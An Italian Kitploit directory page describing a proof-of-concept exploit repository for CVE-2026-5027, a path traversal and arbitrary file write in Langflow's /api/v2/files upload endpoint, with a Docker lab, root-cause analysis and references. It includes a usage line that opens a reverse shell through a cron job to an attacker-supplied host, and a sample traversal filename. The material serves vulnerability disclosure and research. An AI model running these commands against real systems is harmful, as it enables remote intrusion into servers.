Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5027 — Proof-of-concept di exploit per CVE-2026-5027, un path traversal e scrittura arbitraria di file nell'endpoint /api/v2/files di Langflow, con laboratorio Docker e opzione reverse shell. | Kitploit
Strumenti/GitHubGitHub/yym8538/cve-2026-5027
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingStrumento di Accesso Remoto
GitHubyym8538/cve-2026-5027

CVE-2026-5027

Proof-of-concept di exploit per CVE-2026-5027, un path traversal e scrittura arbitraria di file nell'endpoint /api/v2/files di Langflow, con laboratorio Docker e opzione reverse shell.

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Questo post è un articolo di ricerca pubblicato da EQSTLab.

Grazie a Yahia Hamza, che ha segnalato e analizzato questa vulnerabilità.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


Descrizione

CVE-2026-5027 : Vulnerabilità di scrittura arbitraria di file in Langflow

description: Una vulnerabilità di path traversal in Langflow <= 1.8.4 consente agli attaccanti di scrivere file arbitrari al di fuori della directory di upload prevista tramite un filename multipart appositamente craftato fornito all'endpoint /api/v2/files. Nelle distribuzioni in cui l'auto-login è abilitato o l'autenticazione è altrimenti applicata in modo debole, questo problema può essere sfruttato per ottenere l'esecuzione di codice in remoto scrivendo contenuti controllati dall'attaccante in posizioni sensibili del filesystem.


Configurazione del Lab

Crea ed esegui l'ambiente vulnerabile usando Docker:

Build dell'immagine

root@kitploit:~
docker build -t cve-2026-5027 .

Esecuzione del container

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Come usare

Esecuzione

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Analisi

Endpoint vulnerabile

root@kitploit:~
POST /api/v2/files

Il problema esiste perché la funzionalità di upload si fida del valore filename multipart fornito dal client. Invece di generare un nome di archiviazione sicuro lato server o di limitare il percorso risolto a una directory di upload dedicata, il percorso di codice vulnerabile consente a sequenze di traversal come ../ di influenzare il percorso di destinazione finale.

Di conseguenza, un attaccante può uscire dalla root di archiviazione prevista e forzare l'applicazione a scrivere file in posizioni arbitrarie del filesystem del server.

Un flusso di sfruttamento rappresentativo è il seguente:

  1. Ottenere un token di accesso tramite login normale o una distribuzione con auto-login abilitato.
  2. Inviare una richiesta di upload multipart a /api/v2/files.
  3. Fornire un filename appositamente craftato contenente sequenze di path traversal.
  4. Causare la scrittura da parte di Langflow di contenuti controllati dall'attaccante al di fuori della directory di archiviazione prevista.

Si tratta fondamentalmente di un problema CWE-22: Improper Limitation of a Pathname to a Restricted Directory.

Causa tecnica alla radice

La falla di sicurezza è causata da una sanificazione e validazione insufficienti dei percorsi dei file controllati dall'utente durante la gestione dell'upload. L'applicazione accetta il nome file originale del client e lo passa al flusso di archiviazione senza applicare adeguatamente la normalizzazione e il contenimento del percorso.

Da un punto di vista difensivo, il pattern pericoloso è concettualmente simile al seguente:

root@kitploit:~
save_path = base_dir / file.filename

Se file.filename contiene componenti di path traversal come:

root@kitploit:~
../../../../tmp/poc.txt

il percorso finale risolto può puntare al di fuori di base_dir, consentendo la scrittura arbitraria di file.

Perché questo è importante

Le vulnerabilità di scrittura arbitraria di file sono spesso più gravi dei normali problemi di upload non limitato perché l'attaccante controlla non solo il contenuto del file, ma anche il percorso di destinazione. A seconda dei privilegi di runtime del processo Langflow, questo può consentire:

  • sovrascrittura di file dell'applicazione
  • modifica di file di avvio o di attività pianificate
  • persistenza tramite inizializzazione della shell o file di chiavi
  • escalation da scrittura arbitraria di file a esecuzione di codice in remoto

Scenario

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Disclaimer

Questo repository non è inteso a facilitare lo sfruttamento non autorizzato di istanze Langflow. Lo scopo di questo progetto è aiutare i ricercatori di sicurezza, i difensori e gli sviluppatori a comprendere la vulnerabilità, validare l'esposizione in ambienti controllati e applicare mitigazioni efficaci.


Riferimenti

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Scarica lo strumento